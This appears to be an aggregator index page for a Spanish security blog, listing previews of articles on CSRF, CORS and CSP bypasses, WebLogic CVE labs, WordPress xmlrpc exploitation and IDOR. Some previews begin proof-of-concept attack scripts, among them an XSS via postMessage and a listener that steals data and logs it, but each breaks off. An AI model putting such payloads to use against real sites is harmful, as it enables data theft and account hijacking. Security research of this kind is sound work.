Quantcast
Channel: Arthusu BLOG
Browsing index pages (135 articles)

Image may be NSFW.
Clik here to view.

Spyse Recognition - Cybersecurity Tool

Today there are many recognition tools, but let me introduce one that I use today to discover some types of attacks that I will discuss below.Information about a domainThere are many vulnerabilities...

View Article


Image may be NSFW.
Clik here to view.

Article 0

Patron de diseño Builder - parte 2 Si te has perdido la parte 1.  ver parte 1En esta parte veremos 2 formas de usar el patron Builder.Tenemos que generar un objeto helado:Opcion 1: Usaremos la opción...

View Article


Image may be NSFW.
Clik here to view.

Article 1

Patron de diseño Builder - parte 1 El patron de diseño Builder nos permite crear objetos complejoscentralizando el proceso de creación en un único punto. Esto nos permite tener un único proceso de...

View Article

xss Via PostMessage

Poc ejemplo xss PostMessage, id y value deben cambiarse dependiendo de el codigo de postMessage.<a href="#" onclick="xss()">click me</a><script>function xss() {    var win =...

View Article

postMessage Robo de Datos + Guardado en archivo log

El siguiente es un Poc para robo de datos utilizando postMessage:<script>  function listener(event) {    //alert(event.data.value);    var str = event.data.value;    var xmlhttp;     if...

View Article


CORS Bypass 2 - Guardando Resultados en Archivo

<!DOCTYPE html> <html> <head> <script> function hack() {     var xmlhttp;     if (window.XMLHttpRequest)       {           xmlhttp=new XMLHttpRequest();       }         else...

View Article

Image may be NSFW.
Clik here to view.

WebLogic CVE-2019-2725/CNVD-C-2019-48814

Instalación de maquina vulnerable:1.- sudo docker pull vulhub/weblogic2.- sudo docker run -dit -p 7001:7001 vulhub/weblogicDescripcion:Oracle WebLogic Server es un middleware para implementar y...

View Article

Image may be NSFW.
Clik here to view.

WebLogic CVE-2017-10271

Instalacion para POC:1.- sudo docker pull zhiqzhao/ubuntu_weblogic1036_domain2.- sudo docker run -d -p7001:7001 -p80:7001 zhiqzhao/ubuntu_weblogic1036_domainDescripcion:Vulnerabilidad en el componente...

View Article


CORS Bypass

Un CORS mal configurado nos permite ataques tipos CSRF, Obtener datos privados y mas. Aqui les dejo una entrada de CORS:https://arthusu.blogspot.com/2018/08/cors-mal-configurado-intercambio-de.htmlY un...

View Article


Image may be NSFW.
Clik here to view.

Ataque de extension de longitud

¿Que es?En criptografía y seguridad informática, un ataque de extensión de longitud es un tipo de ataque en el que un atacante puede usar el hash y la longitud del mensaje, para calcular el hash de un...

View Article

Image may be NSFW.
Clik here to view.

Node JS: Seguridad y Explotacion

IntroducciónNode.js es un entorno en tiempo de ejecución multiplataforma, de código abierto, para la capa del servidor basado en el lenguaje de programación ECMAScript, asíncrono, con I/O de datos en...

View Article

Image may be NSFW.
Clik here to view.

PHPCS Security Audit en XAMPP

phpcs security audit es un conjunto de reglas PHP_CodeSniffer que encuentra vulnerabilidades y debilidades relacionadas con la seguridad en el código PHP.Github:...

View Article

Utilizando Redireccionamientos abiertos para bug bounties

IntroduccionEsto es solo una publicacion rapida que describe algunos consejos utiles para identificar vulnerabilidades de redireccionamiento abierto y tambien como utilizarlas para crear...

View Article


Image may be NSFW.
Clik here to view.

Selenium Automatizando el navegador PHP-WebDriver by Facebook

¿Que es Selenium?Selenium automatiza los navegadores. ¡Eso es! Lo que hagas con ese poder depende totalmente de ti. Principalmente, es para automatizar aplicaciones web con fines de prueba, pero...

View Article

Image may be NSFW.
Clik here to view.

Saltar CSRF Referer en Blanco

Cuando se comenta un video en xvideos, se envian 0 tokens CSRF. La solicitud es: POST http://www.xvideos.com/video-post-comment/video_id/ HTTP/1.1 user=testuser&comment=testy&test=ok podemos...

View Article


Image may be NSFW.
Clik here to view.

Saltando CSRF

Cross site request forgery (CSRF) estan diseñados para enviar que un FORM POST oculto en maligno.com sea enviado en secreto para secuestrar su cuenta en ejemplo.com. Los sitios web como Facebook...

View Article

Image may be NSFW.
Clik here to view.

Wordpress xmlrpc.php: vulnerabilidades comunes y como explotarlas

¿De que se trata este post?Es posible que haya visto un archivo xmlrpc.php en muchos sitios de Wordpress que visite, incluso que haya intentado buscar el error (el servidor XML-RPC solo acepta...

View Article


Image may be NSFW.
Clik here to view.

Como saltar CSP (Content Security Policy)

IntroduccionLa política de seguridad de contenido (CSP) es un estándar de seguridad informática introducido para evitar la secuencia de comandos (XSS), clickjacking y otros ataques de inyección de...

View Article

Image may be NSFW.
Clik here to view.

Usando Burp con TOR

Buenas amigos esto es algo fácil de hacer así que espero hacerlo por pasos y si agregar unas cuantas imágenes.1.- descargamos TOR: https://www.torproject.org/2.- abrimos el navegador de tor vamos a...

View Article

IDOR: Referencia insegura de objeto directo

Es una vulnerabilidad que generalmente conduce a la perdida de datos confidenciales, pero también puede dar lugar a una menor modificación de los datos.Considere una URL como:...

View Article
Browsing index pages (135 articles)


Latest Images